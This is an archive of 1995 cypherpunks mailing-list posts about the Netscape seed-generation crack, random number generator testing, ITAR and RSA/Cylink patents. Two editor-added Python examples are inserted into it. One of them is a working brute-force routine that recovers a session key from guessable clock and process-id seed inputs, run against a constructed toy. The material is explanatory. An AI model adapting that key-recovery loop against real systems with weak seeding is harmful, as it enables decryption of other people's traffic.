Both would be ideal but a design and proof of having audited it would be good if they are expecting people to trust this thing for megabucks as internet commerce takes off. > Netscape may have hot programmers but so far I believe it has become > self-evident that they know little about crypto and implementing > cryptosystems. yup. > To Netscape's credit, Jeff Weinstein claims that the team > implementing the security for Navigator 2.0 is completely new and of > course Netscape has hired Tahir ElGamal, who certainly knows what he > is doing. Additionally I would suspect that with all the bad > publicity they are receiving they would take up Bidzos on RSADSI's > offer to analyze the source. So it is entirely possible that > Navigator 2.0 will be much better. However, I am not holding my > breath. Well I highly doubt they'd GPL the code. Or even make the code available. But it would be really, really nice if a fresh outlook was taken on this, code is required to trust the thing, as that shows a willingness to expose the workings, and confidence in the implementation, and algorithms. I hope some serious thought goes into this issue at netscape, about giving out code for their security implementation. There are still possibilities for server bugs, and so on. > Strong crypto is _hard_ to implement properly. Even if a product is > using a well-known algorithm there could be any number of subtle > flaws that can destroy any security offered by such algorithm. You > can't just toss in RSA, IDEA, RC-4, DES, etc... and claim the thing > is secure. No, you can't. Sadly, I presume that they have no intention of releasing source. So we'll have to be content with RSADSI security audit. Or another break. Adam From dl at hplyot.obspm.fr Tue Sep 19 11:09:19 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Tue, 19 Sep 95 11:09:19 PDT Subject: (Yet Another?) 
Netscape Crack Web page In-Reply-To: <9509191431.AA23188@hplyot.obspm.fr> Message-ID: <9509191808.AA24749@hplyot.obspm.fr> > http://hplyot.obspm.fr/~dl/netscapesec/ I have designed and added what I consider a nice looking logo for that page, have a look :-) {I'm not an artist though, but xv, xpaint and patience can make wonders} Regards dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept From nielsenc at upgrade.com Tue Sep 19 11:18:41 1995 From: nielsenc at upgrade.com (Christopher Nielsen) Date: Tue, 19 Sep 95 11:18:41 PDT Subject: Verification of Random Number Generators In-Reply-To: Message-ID: <199509191817.OAA05143@upgrade.com> On Tue, 19 Sep 1995 09:04:29 -0700 "Erik E. Fair" wrote: -------- >> >> Just an idle thought: it might be possible to do a probabalistic >> verification of a RNG by sampling it over some number of samples, and >> statistically analyzing the sample space. This would be analysis under the >> model of "RNG as black box" as opposed to (or rather, if you're smart, in >> addition to) code inspection & review. Any statisticians among us? >> >> Erik Fair >> But statistical tests of randomness alone do not make a good RNG. At least, not for cryptographic use. A cryptographically secure RNG is also unpredictable, i.e., computationally unfeasible to predict the next random bit will be given the algorithm, and not reliably reproduced, i.e., multiple runs with the exact same input do not generate the same sequence. -Chris =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Christopher Nielsen UCA&L System and Network Administrator Buffalo, New York (nielsenc at upgrade.com) #include From droelke at rdxsunhost.aud.alcatel.com Tue Sep 19 11:21:57 1995 From: droelke at rdxsunhost.aud.alcatel.com (Daniel R. 
Oelke) Date: Tue, 19 Sep 95 11:21:57 PDT Subject: Verification of Random Number Generators Message-ID: <9509191821.AA21270@spirit.aud.alcatel.com> > > Just an idle thought: it might be possible to do a probabalistic > verification of a RNG by sampling it over some number of samples, and > statistically analyzing the sample space. This would be analysis under the > model of "RNG as black box" as opposed to (or rather, if you're smart, in > addition to) code inspection & review. Any statisticians among us? > In a word - no. In a longer description - you can black box test the *pseudo-RNG in one of two ways. One, input a key, and then keep asking for numbers. The numbers should be statistically distributed, and should have a very long repeat cycle. (i.e. basic "good" pseudo-random number generator theory) Two, input different keys, and then ask for a number. Again, the numbers should be statistically distributed, even for small changes in the input numbers. What *both* of those methods don't test, is the key(seed) generation, which is what was attacked on Netscape. The seed number must be truely random, and unknowable to the attacker, otherwise they can duplicate the random number generator. Remember that all random number generators in software are really pseudo-random number generators, and rely on having seed value. BTW: In some ways, I feel sorry for Netscape being nailed by everyone including the press like this. BUT - they must also accept that with being popular, that they will be subject to intense scrutiny. 
Besides - if you are going to attack a cryptosystem, why not get your 15 minutes of fame out of deal while you are at it ;-) Dan ------------------------------------------------------------------ Dan Oelke Alcatel Network Systems droelke at aud.alcatel.com Richardson, TX From lethin at ai.mit.edu Tue Sep 19 11:22:00 1995 From: lethin at ai.mit.edu (Rich Lethin) Date: Tue, 19 Sep 95 11:22:00 PDT Subject: ASCII unabomber paper attribution and FTP address Message-ID: <199509191821.OAA15570@grape-nuts.ai.mit.edu> N.B. unabomber paper is is via JYA_lbr. Also available via FTP ftp://ftp.ai.mit.edu/users/misc/unabomber From sameer at c2.org Tue Sep 19 11:34:23 1995 From: sameer at c2.org (sameer) Date: Tue, 19 Sep 95 11:34:23 PDT Subject: "Hackers"-- brief review and anecdote... In-Reply-To: Message-ID: <199509191829.LAA09602@infinity.c2.org> > > On Tue, 19 Sep 1995, Rev. Mark Grant wrote: > > > On Sun, 17 Sep 1995, Brian Davis wrote: > > > > > Phill obviously presents one point of view, vigorously and well. What do > > > the rest of you think about a teen who, say, busts into a .edu site, > > > plays with the files, and ultimately brings the system down entirely for > > > 36 hours? Fun and games? Send him to his room, sans modem? Prosecute > > > him? Have a TLA hire him??? > > > > If it wasn't for ITAR the Net would already have secure encryption and > > authentication, and most such hacker attacks would be impossible (or at > > least impractical). > > > > Mark > > The non-responsive answer is stricken from the record. :-) > You mean "secure" as Netscape was secure from sameer et al.? > The first two hacks listed on my web page were made possible because of ITAR. Without ITAR Netscape would not have been suspectible to this attack. Two out of three fits my definition of "most". 
-- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From kelso at netcom.com Tue Sep 19 11:49:36 1995 From: kelso at netcom.com (Tom Rollins) Date: Tue, 19 Sep 95 11:49:36 PDT Subject: Crypto Sync Issue Message-ID: <199509191846.LAA24272@netcom4.netcom.com> Hello, I am interested in encrypting a SLIP link between my PC (running Linux) and my Netcom shell account (running SLIRP). My question has to do with error conditions on the line. If I drop a character or packet, the two sides will loose crypto sync and result in things scrambled from then on. The modems will fix most of the low level problems. However, Murphy's Law has not been repealed. :) Are there any standard methods to provide the SYNC between the sender(encryption) and the receiver(decryption) on an Async connection ? Since Slip uses IP packets, I was planning on an encryption of the data portion of the IP packets (leaving the header alone). Thanks, Tom Rollins From lmccarth at cs.umass.edu Tue Sep 19 11:56:10 1995 From: lmccarth at cs.umass.edu (L. McCarthy) Date: Tue, 19 Sep 95 11:56:10 PDT Subject: Encryption algorithms used in PrivaSoft In-Reply-To: <9509191826.AA19743@server1.deltanet.com> Message-ID: <9509191855.AA04334@cs.umass.edu> Dear PrivaSoft- Your Web page, "What is PrivaSoft ?" (http://www.megasoft.com/privasoft/about.html) says: > How does it work? > > PrivaSoft scrambles and descrambles an image of the document using Bitmap > encryption. When scrambling, PrivaSoft divides the document into tiny tiles > and shuffles them pseudo-randomly using your secret key as part of the > encryption algorithm. This is an extremely general description of encryption and decryption. I am interested in learning more about the cryptographic algorithms used in the PrivaSoft product. Where should I look for further details ? 
Are there technical contacts within your organization who would be willing to discuss this in email ? References would be greatly appreciated. Sincerely -L. McCarthy From lmccarth at cs.umass.edu Tue Sep 19 12:10:54 1995 From: lmccarth at cs.umass.edu (L. McCarthy) Date: Tue, 19 Sep 95 12:10:54 PDT Subject: ASCII unabomber paper attribution and FTP address In-Reply-To: <199509191821.OAA15570@grape-nuts.ai.mit.edu> Message-ID: <9509191910.AA04919@cs.umass.edu> Rich Lethin writes: > N.B. unabomber paper is is via JYA_lbr. Also available via FTP > > ftp://ftp.ai.mit.edu/users/misc/unabomber Actually it's: ftp://ftp.ai.mit.edu/pub/users/misc/unabomber From sameer at c2.org Tue Sep 19 12:29:18 1995 From: sameer at c2.org (sameer) Date: Tue, 19 Sep 95 12:29:18 PDT Subject: Verification of Random Number Generators In-Reply-To: <9509191821.AA21270@spirit.aud.alcatel.com> Message-ID: <199509191924.MAA20090@infinity.c2.org> > > BTW: In some ways, I feel sorry for Netscape being nailed by everyone > including the press like this. BUT - they must also accept that I'm sorry, but they deserve it. Their seed generation was just plain stupid. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From lmccarth at cs.umass.edu Tue Sep 19 12:29:35 1995 From: lmccarth at cs.umass.edu (L. McCarthy) Date: Tue, 19 Sep 95 12:29:35 PDT Subject: Encryption algorithms used in PrivaSoft (fwd) Message-ID: <9509191929.AA15153@cs.umass.edu> Confirming suspicions that PrivaSoft is a security-through-obscurity outfit: > From: David Clavadetscher > Subject: Re: Encryption algorithms used in PrivaSoft > > Dear L., > > At this time our crypto engine is patented and proprietary. If you tell me > the intent of your interest I will see what other information we can provide > to you. Call me if you like. [...] 
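The standard answer to Tom Rollins's "Crypto Sync Issue" question above is to stop relying on shared cipher state at all: send an explicit per-packet sequence number in the clear, derive that packet's keystream from the key and the sequence number alone, and authenticate each packet, so a dropped or garbled packet affects only itself (this is the shape IPsec ESP later standardised). The block below is an added example written for this page, not code from anyone in the thread. The key, the packet contents and the lossy-line simulation are constructed; HMAC-SHA256 run in counter mode stands in for a real cipher in CTR mode.

```python
import hashlib
import hmac
import struct

# Editor-added example, not code from anyone in this thread: make each
# encrypted packet self-contained by sending an explicit sequence number and
# deriving that packet's keystream from (key, sequence number) alone, so a
# dropped or garbled packet never desynchronises the two ends. The keystream
# here is HMAC-SHA256 in counter mode, a stand-in for a real cipher in CTR
# mode; the structure, not the cipher, is what the question was about.

KEY = b"constructed demo key, not for real use"
SEQ_LEN = 4     # sequence number, sent in the clear ahead of each payload
TAG_LEN = 16    # truncated HMAC over seq || ciphertext


def _keystream(key: bytes, seq: int, length: int) -> bytes:
    """Keystream for packet number `seq`; no dependence on earlier packets."""
    out = b""
    block = 0
    while len(out) < length:
        out += hmac.new(key, struct.pack(">II", seq, block), hashlib.sha256).digest()
        block += 1
    return out[:length]


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def seal_packet(key: bytes, seq: int, payload: bytes) -> bytes:
    """Wire format: seq || ciphertext || tag. Only the payload is encrypted,
    as the poster intended; the IP header is left alone."""
    header = struct.pack(">I", seq)
    ct = _xor(payload, _keystream(key, seq, len(payload)))
    tag = hmac.new(key, header + ct, hashlib.sha256).digest()[:TAG_LEN]
    return header + ct + tag


def open_packet(key: bytes, wire: bytes, highest_seen: int):
    """Return (seq, payload) for a good packet, or None for one that is
    damaged (tag mismatch) or a replay/out-of-order duplicate. Decryption
    uses only the seq carried in the packet, so gaps do not matter."""
    if len(wire) < SEQ_LEN + TAG_LEN:
        return None
    header, ct, tag = wire[:SEQ_LEN], wire[SEQ_LEN:-TAG_LEN], wire[-TAG_LEN:]
    want = hmac.new(key, header + ct, hashlib.sha256).digest()[:TAG_LEN]
    if not hmac.compare_digest(tag, want):
        return None                     # line noise the modem did not catch
    (seq,) = struct.unpack(">I", header)
    if seq <= highest_seen:
        return None                     # replay or stale duplicate
    return seq, _xor(ct, _keystream(key, seq, len(ct)))


def run_demo(drop=frozenset({2}), corrupt=frozenset({4})):
    """Send five constructed packets over a lossy line: drop some, flip a
    ciphertext byte in others. Returns [(seq, payload-or-None), ...] as seen
    by the receiver; packets after a loss still decrypt correctly."""
    highest = 0
    seen = []
    for seq in range(1, 6):
        if seq in drop:
            continue
        wire = seal_packet(KEY, seq, b"packet-%d" % seq)
        if seq in corrupt:
            wire = wire[:SEQ_LEN] + bytes([wire[SEQ_LEN] ^ 0x01]) + wire[SEQ_LEN + 1:]
        result = open_packet(KEY, wire, highest)
        if result is None:
            seen.append((seq, None))
        else:
            highest = result[0]
            seen.append(result)
    return seen
```

Running `run_demo()` shows packet 2 lost and packet 4 rejected by its tag, while packets 3 and 5 still decrypt, which is exactly what a stateful stream cipher over the raw serial line cannot give you. A strictly increasing sequence number is the simplest anti-replay rule; a real implementation over a link that can reorder packets would use a sliding replay window instead, and the sequence number must never wrap under the same key.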
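Sameer's remark above that Netscape's seed generation was "just plain stupid" is about the point the thread keeps returning to: the PRNG and the 40-bit key can both be fine, and the session is still lost if the seed is built from values an eavesdropper can bracket. The block below is an added example written for this page; it is not Netscape's seeding routine and not code posted by anyone in the thread. The seed inputs (clock, pid, parent pid) are a constructed model with the same shape as the guessable inputs discussed, and MD5 in counter mode stands in for RC4.

```python
import hashlib
import struct

# Editor-added illustration, not code from Netscape or from anyone in this
# thread: a session key is only as strong as the seed behind it. The seed
# inputs here (clock, pid, parent pid) are a constructed model with the same
# shape as the guessable inputs discussed in the thread; the exact routine
# Netscape used is not reproduced. MD5 in counter mode stands in for RC4.

KNOWN_PLAINTEXT = b"GET / HTTP/1.0\r\n"   # first bytes of any HTTP request


def seed_from(secs: int, usecs: int, pid: int, ppid: int) -> bytes:
    """Seed = MD5 over four quantities an attacker can bracket (constructed model)."""
    return hashlib.md5(struct.pack(">IIII", secs, usecs, pid, ppid)).digest()


def session_key(seed: bytes) -> bytes:
    """40-bit export-grade key derived from the seed."""
    return hashlib.md5(b"key" + seed).digest()[:5]


def keystream(key: bytes, n: int) -> bytes:
    """Toy keystream: MD5 of key || counter, repeated."""
    out = b""
    ctr = 0
    while len(out) < n:
        out += hashlib.md5(key + struct.pack(">I", ctr)).digest()
        ctr += 1
    return out[:n]


def encrypt(key: bytes, data: bytes) -> bytes:
    """XOR with the keystream; decryption is the same operation."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))


def recover_key(ciphertext: bytes, secs_guess: int, usec_step: int,
                pid_lo: int, pid_hi: int, ppid: int):
    """Walk the seed space the attacker is left with once clock, parent pid
    and a pid range are known. A candidate is confirmed by the known
    plaintext at the start of the request. Returns (key, tries)."""
    tries = 0
    for secs in (secs_guess - 1, secs_guess, secs_guess + 1):
        for usecs in range(0, 1_000_000, usec_step):
            for pid in range(pid_lo, pid_hi):
                tries += 1
                key = session_key(seed_from(secs, usecs, pid, ppid))
                if encrypt(key, ciphertext[:len(KNOWN_PLAINTEXT)]) == KNOWN_PLAINTEXT:
                    return key, tries
    return None, tries


def demo():
    """Victim values (constructed): the attacker knows the second, the parent
    pid, the pid to within 500, and a clock whose usec field moves in 10 ms
    steps. That leaves 3 * 100 * 500 = 150,000 seeds, not 2^40 keys."""
    secs, usecs, pid, ppid = 811_540_000, 730_000, 21_387, 21_001
    true_key = session_key(seed_from(secs, usecs, pid, ppid))
    ct = encrypt(true_key, KNOWN_PLAINTEXT + b"Host: www.netscape.com\r\n")
    found, tries = recover_key(ct, secs, 10_000, 21_000, 21_500, ppid)
    return found == true_key, tries
```

`demo()` recovers the key after well under 150,000 trial seeds, which is what Bill Stewart means further down when he says the seeding, not the PRNG output, is where the patterns are: the fix is not "more" sources of this kind but sources the attacker genuinely cannot enumerate.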
From tedwards at Glue.umd.edu Tue Sep 19 12:38:35 1995 From: tedwards at Glue.umd.edu (Thomas Grant Edwards) Date: Tue, 19 Sep 95 12:38:35 PDT Subject: NYT on Netscape Crack In-Reply-To: <199509190355.XAA01329@frankenstein.piermont.com> Message-ID: On Mon, 18 Sep 1995, Perry E. Metzger wrote: > Not, of course, that they disclosed it before -- it was found by > reverse engineering the distributed executable. Not, of course, that > they have a choice in the matter of whether to disclose it -- they > will be "disclosing" how it's done as soon as they release the > code. Not, of course, that security through obscurity does any good -- > it just magnifies the pain. Well, now that Cypherpunks have again shown yet another hole in Netscape security, I think we are in pretty good standing to demand ACCESS TO SOURCE CODE FOR NETSCAPE, so we can work to help make Netscape "pretty good". Any reporters listening? -Thomas From tedwards at Glue.umd.edu Tue Sep 19 12:44:12 1995 From: tedwards at Glue.umd.edu (Thomas Grant Edwards) Date: Tue, 19 Sep 95 12:44:12 PDT Subject: NSA and Netscape Crack (Re: NYT on Netscape Crack) In-Reply-To: Message-ID: On Mon, 18 Sep 1995, Timothy C. May wrote: > If the "flaws" are being found by our group, as John notes, just what is > the NSA doing in the _second_ role it is supposed to have, its "COMSEC," > or communications security, role? Gee Tim, NSA is "helping" us out by creating Clipper and new key escrow mechanisms ;) "I'm from the NSA, I'm here to help your crypto..." -Thomas From tedwards at Glue.umd.edu Tue Sep 19 12:46:05 1995 From: tedwards at Glue.umd.edu (Thomas Grant Edwards) Date: Tue, 19 Sep 95 12:46:05 PDT Subject: AOL monitoring In-Reply-To: <+3OXwAgbBgzR084yn@panix.com> Message-ID: On Sun, 17 Sep 1995, Sal Denaro wrote: > 2) My .newsrc file can tell anyone that I read alt.hackers and alt.2600 Hmmm...potential new crypto product...a "secure" newsreader with encrypted .newsrc? 
-Thomas From stewarts at ix.netcom.com Tue Sep 19 12:47:34 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 19 Sep 95 12:47:34 PDT Subject: Verification of Random Number Generators Message-ID: <199509191947.MAA23655@ix3.ix.netcom.com> At 11:54 AM 9/19/95 -0500, andrew wrote, replying to Eric Fair: >> Just an idle thought: it might be possible to do a probabilistic >> verification of a RNG by sampling it over some number of samples, >But this wouldn't have solved Netscape's problem. Netscape was using a >pretty good PRNG (the one in RSAREF). The problem was they were/are using a >naive method of seeding it. The output of the PRNG would have been >statistically random, but since the seed had ridiculously little entropy it >was easy to guess. It's even worse - the seeding mechanism has too little entropy, given that you know some of the input data (e.g. system clock), but if it had, say, 32 bits of entropy, you'd have to run your test tens or hundreds of billions of times for the patterns to really show up - which is hard to do for something that uses the system clock or other hardware - and you'd really have to get at the output of the seeding process rather than the PRNG output, which has been filtered through enough MD5 that it's hard to detect the patterns. But you could still crack it easily enough. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From vince at offshore.com.ai Tue Sep 19 12:50:49 1995 From: vince at offshore.com.ai (Vincent Cate) Date: Tue, 19 Sep 95 12:50:49 PDT Subject: Caribbean Internet Services? (yes!) In-Reply-To: Message-ID: > Perry E. Metzger > Timothy C. May writes: > > Power in St. Thomas may not be back for a year in some parts. The roads, > > sewers, power lines, phone system, etc. will likely have to be completely > > rebuilt. > [...] 
> > I suspect "Caribbean Data Havens" and "Internet Sites" are further off than > > they were a few months ago. > > Not really. I suspect that phone company co-location and using buried > lines and your own generator would probably fix most problems if you > were "serious" about doing such a thing. We are not so bad off down here. Anguilla took a direct hit from Luis. Some of us have had to move computers into town for a week or two, but that is really it. Also, it has meant a couple weeks where we did not get as much done, but not months of setback. There is power and phone in town, cell phones work (give me a ring at (809) 497-7255), generators are not that expensive (like $600 for 5 kw). The utility poles have almost all been straightened or replaced already (2 weeks). The high-tension lines have already been strung to many places (like near my house). Anguilla should be rewired within another 6 weeks (we had the HMS Southampton here for the last 2 weeks and now have 100 Royal Engineers helping out). Nobody was killed here. We all have our own cisterns so we have water, just bucket powered. The places that were hit hard were poor areas that some of the islands have, and people on boats. Also, some other islands will have water problems (not Anguilla). -- Vince Cate From Anguilla - A tax-haven in the Caribbean (or as they like to say, a "Zero tax jurisdiction") http://www.offshore.com.ai/anguilla http://www.aibs.com.ai/ From cwe at Csli.Stanford.EDU Tue Sep 19 12:51:00 1995 From: cwe at Csli.Stanford.EDU (Christian Wettergren) Date: Tue, 19 Sep 95 12:51:00 PDT Subject: Random publicity was: articles In-Reply-To: <43mrf2$arr@calum.csclub.uwaterloo.ca> Message-ID: <199509191950.MAA06575@Csli.Stanford.EDU> | This morning, one of the University's publicity people | forwarded Marketplace (a radio show) | and CNN (sending a camera crew) to me. Ouch - had a good night's sleep, did you? 
:-) | I've also received email from various people, including someone who | works in security at the Pentagon. | | I wonder if I should tell them I'm not an American? | | - Ian "but I'm Canadian, so that's the same thing, right?" :-( Too bad, you should have been a Swede, like me. Wouldn't it be fun to say something like: "Well, I'm not allowed to reveal this weakness to any American, since I'm not allowed to export munitions!" /Christian From WOOD at VAX2.ROCKHURST.EDU Tue Sep 19 13:06:26 1995 From: WOOD at VAX2.ROCKHURST.EDU (WOOD at VAX2.ROCKHURST.EDU) Date: Tue, 19 Sep 95 13:06:26 PDT Subject: netscape broken on NPR Message-ID: <01HVGQF85HCY00038M@VAX2.ROCKHURST.EDU> NPR reported on the security flaw in Netscape, 3:05 pm CDT. ------------------------------------------- | "Computers are boring and slow." | | | | David Wood | | Information Systems Specialist? | | wood at vax2.rockhurst.edu | ------------------------------------------- From tedwards at Glue.umd.edu Tue Sep 19 13:09:56 1995 From: tedwards at Glue.umd.edu (Thomas Grant Edwards) Date: Tue, 19 Sep 95 13:09:56 PDT Subject: NYT on Netscape Crack In-Reply-To: <9509191438.AA16172@toad.com> Message-ID: On Tue, 19 Sep 1995, Eli Brandt wrote: > It sounds as if Netscape thinks that public knowledge of the key > generation is part of the problem. I hope somebody on the security > team convinces management that entropy is more important than publicity. No matter what they say in the press, I doubt it will take more than a few weeks to reverse engineer the new RNG seeder and figure out where the data comes from. I am hoping it was more of a PR thing than a technical thing. I hope that Netscape tells us their RNG seed so Cypherpunks don't have to go to all the trouble. If they tell us, we can let them know if it is a reasonable mechanism or bogus. 
-Thomas From tedwards at Glue.umd.edu Tue Sep 19 13:24:15 1995 From: tedwards at Glue.umd.edu (Thomas Grant Edwards) Date: Tue, 19 Sep 95 13:24:15 PDT Subject: Investing on Information We Get Here In-Reply-To: Message-ID: On Tue, 19 Sep 1995, Timothy C. May wrote: > P.S. On Netscape, I've finally decided to do some buying. Sure, this latest > flaw is another embarrassment. But more deals and link-ups than ever are > being inked, and they've got the resources to really spruce up Navigator > and related products. I just don't see too many competitors on the horizon. Let's not forget that Netscape is the biggest and best boon to the internet I've ever seen. It is selling more bandwidth, servers, and dial-up IP than anything that has come down the road. It is enabling people to put even more info on the net, and I love it! Of course, that is why it was targeted for the 40-bit RC4 crack, its immense popularity. The total bogosity of 40-bit keys is now pretty apparent, and it is helping moves to 64-bit export, and perhaps beyond. -Thomas From dccotey at eclat.uccs.edu Tue Sep 19 13:50:03 1995 From: dccotey at eclat.uccs.edu (Daniel C. Cotey) Date: Tue, 19 Sep 95 13:50:03 PDT Subject: "Hackers"-- brief review and anecdote... In-Reply-To: Message-ID: On Tue, 19 Sep 1995, Rev. Mark Grant wrote: > > If it wasn't for ITAR the Net would already have secure encryption and > authentication, and most such hacker attacks would be impossible (or at > least impractical). > As someone who has hacked a little I would say that sloppy coding (much like netscape's) has helped hackers far more than lack of encryption. Imagine for a moment if sun had included some form of encryption (maybe in nfs ?) in sunos 4.x.x, would it have been effective if it had as many holes as sendmail, etc.. ? Good algorithms well coded will hurt hackers. 
Good algorithms sloppily coded will simply provide hackers with one more toy to abuse, while giving average people a false sense of security (but you SAID it was strong crypto, so why did they get my credit card number ?) pUFF From jya at pipeline.com Tue Sep 19 14:10:50 1995 From: jya at pipeline.com (John Young) Date: Tue, 19 Sep 95 14:10:50 PDT Subject: SUP_con Message-ID: <199509192103.RAA01374@pipe5.nyc.pipeline.com> 9-19-95. WashRag: "U.S. Agencies at Odds On Computer Exports." The State, Commerce and Defense departments are pushing for a loosening of federal controls on the export of U.S. supercomputers to all but a few developing nations, a move that would put extraordinary computing power into the hands of governments that have long been denied it. The proposal also has collected strong support from the computer industry but has provoked criticism from the Energy Department and the Arms Control and Disarmament Agency. Advocates of the plan want President Clinton to announce the new, weaker export limits during a proposed visit to a computer factory in California's Silicon Valley on Thursday. [No crypto mentioned.] "French Nuclear Program Closely Tied to U.S. Sharing of Sensitive Codes, Access to California Labs to Expand." Despite its claims of developing an independent nuclear deterrent, France has long relied on the U.S. for some of the most sophisticated technologies needed to upgrade and maintain a modern nuclear arsenal. Although known to specialists, the U.S.-French nuclear links have been little discussed over the years. Officials are currently trying to negotiate an arrangement under which the two sides will begin to share sensitive computer codes that describe how bombs behave when they are detonated. France needs the data to make full use of access to two sophisticated new U.S. nuclear weapons research facilities that Washington has quietly offered French weapons experts. 
Deux: SUP_con (15 kb) From anonymous at freezone.remailer Tue Sep 19 14:12:16 1995 From: anonymous at freezone.remailer (anonymous at freezone.remailer) Date: Tue, 19 Sep 95 14:12:16 PDT Subject: Cylink Message-ID: <199509192112.RAA10595@light.lightlink.com> WSJ, Sept 19, 1995. Cylink Claims Right To Key Technology Involving Encryption Sunnyvale, Calif. - A Silicon Valley company asserted a legal claim to a key technology for protecting electronic commerce, following an arbitration ruling. Closely held Cylink Corp. said the ruling gave back to the company control over two key Stanford University patents regarding public-key encryption, a technique for scrambling data from theft or eavesdropping. A panel of three arbitrators, asked to settle a dispute between Cylink and RSA Data Security Inc., dissolved a five-year partnership between the two that pooled their encryption patents. RSA, a closely held company based in Redwood City, Calif., is the dominant supplier of encryption software, with users that include Microsoft Corp., Novell Inc., Netscape Communications Corp., Apple Computer Inc. and International Business Machines Corp. The arbitrators ruled that RSA hasn't had the right to sublicense the Stanford patents since 1990. Cylink said it would seek royalties from companies that have licensed software code from RSA and are redistributing it, arguing that they are infringing the Stanford patents. ----- From rah at shipwright.com Tue Sep 19 14:16:58 1995 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 19 Sep 95 14:16:58 PDT Subject: Financial Services Technology Consortium Message-ID: A friend found this... Cheers, Bob Hettinga --- begin forwarded text Bob: I was looking for a web site for Shawmut/Fleet Bank and could not find one. But I did come across this which I thought might be of particular interest to you... 
http://www.llnl.gov/fstc/index.html It is the Financial Services Technology Consortium (FSTC), which is a consortium of financial services providers, national laboratories, universities, and government agencies who sponsor and participate in non-competitive collaborative research and development on interbank technical projects. Cheers, Will --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From ravage at einstein.ssz.com Tue Sep 19 14:30:13 1995 From: ravage at einstein.ssz.com (Jim Choate) Date: Tue, 19 Sep 95 14:30:13 PDT Subject: ASCII unabomber paper attribution and FTP address (fwd) Message-ID: <199509192140.QAA02210@einstein.ssz.com> Forwarded message: > From: lmccarth at cs.umass.edu (L. McCarthy) > Subject: Re: ASCII unabomber paper attribution and FTP address > Date: Tue, 19 Sep 1995 15:10:48 -0400 (EDT) > > Actually it's: > > ftp://ftp.ai.mit.edu/pub/users/misc/unabomber > > It isn't as of 4:28 Central...:( Anyone got a clue as to where it has flown to? Jim From jya at pipeline.com Tue Sep 19 14:32:13 1995 From: jya at pipeline.com (John Young) Date: Tue, 19 Sep 95 14:32:13 PDT Subject: Una FTPaper 2 Message-ID: <199509192132.RAA04891@pipe5.nyc.pipeline.com> ftp.hacktic.nl/pub/incoming/unabomb.txt From droelke at rdxsunhost.aud.alcatel.com Tue Sep 19 14:40:09 1995 From: droelke at rdxsunhost.aud.alcatel.com (Daniel R. Oelke) Date: Tue, 19 Sep 95 14:40:09 PDT Subject: Netscape responds. Message-ID: <9509192139.AA21854@spirit.aud.alcatel.com> Netscape now has an article on their home page about the latest break in their security. 
Dan ------------------------------------------------------------------ Dan Oelke Alcatel Network Systems droelke at aud.alcatel.com Richardson, TX From sharborth at hai-net.com Tue Sep 19 14:56:15 1995 From: sharborth at hai-net.com (sharborth at hai-net.com) Date: Tue, 19 Sep 95 14:56:15 PDT Subject: Netscape's random numbers Message-ID: <9508198115.AA811559884@houston_cc_smtp.hai-net.com> Congrats, nice job! The Netscape license explicitly prohibits decompiling (except where such prohibition is illegal). When this hits the media it will be important to avoid being tarred with the "hacker breaks rules and breaks in" brush. More subtly, it's probably a bad idea to call into question the overall business model of client binaries on the net. So. At least they're honest and let everybody know. Instead, emphasize importance of open code, public reviews, ability to link in your own code that meets public specs, etc. All of these things the Internet was designed to do, and U.S. ITAR regulations are designed to prohibit (globally, anyway). And also that the bad guys will never play by the rules. And re-emphasize that solutions are possible, just that the U.S. government prevents them from being deployed in a global economy. Hear, hear! Perhaps draw parallels to the recent Microsoft Word virus. /r$ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-= W.S. "Skip" Harborth Manager & Senior Engineer Information Systems Security Engineering Houston Associates, Incorporated 4601 North Fairfax Dr, Suite 1001 Arlington, Virginia 22203 USA (703) 284-8732 812-5099 (fax) sharborth at hai-net.com The opinions expressed are my own and have no relation to my employer. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-= From thad at hammerhead.com Tue Sep 19 15:00:48 1995 From: thad at hammerhead.com (Thaddeus J. Beier) Date: Tue, 19 Sep 95 15:00:48 PDT Subject: Cylink Message-ID: <199509192138.OAA07353@hammerhead.com> > WSJ, Sept 19, 1995. 
> > Cylink Claims Right To Key Technology Involving > Encryption > > ... > > Sunnyvale, Calif. - A Silicon Valley company asserted a > legal claim to a key technology for protecting electronic > commerce, following an arbitration ruling. > > ... The arbitrators > ruled that RSA hasn't had the right to sublicense the > Stanford patents since 1990. > > Cylink said it would seek royalties from companies that > have licensed software code from RSA and are > redistributing it, arguing that they are infringing the > Stanford patents. > This was reported in the San Jose Mercury News today, as well. They reported that Cylink licenses the patents for $50,000. I'm assuming that the main patent in question is the Diffie-Hellman patent (only 1 year and 7 months to DH Freedom Day!). Since PKP (and Bidzos, now president of RSA) always said that DH covered all public key encryption, it would seem that any RSA licensee would also need a license from Cylink. The Merc article said that RSA's and Cylink's interpretations of the arbitrators' ruling were completely opposite. I haven't seen a copy of the ruling. The Merc says that "Outside observers tend to take RSA's view of things." I'm stunned that an arbitrator could make an uninterpretable ruling on something so cut and dried, but then, IANAL. I've called both PKP and RSA, I haven't been able to talk to anybody about it yet. thad -- Thaddeus Beier email: thad at hammerhead.com Technology Development vox: 408) 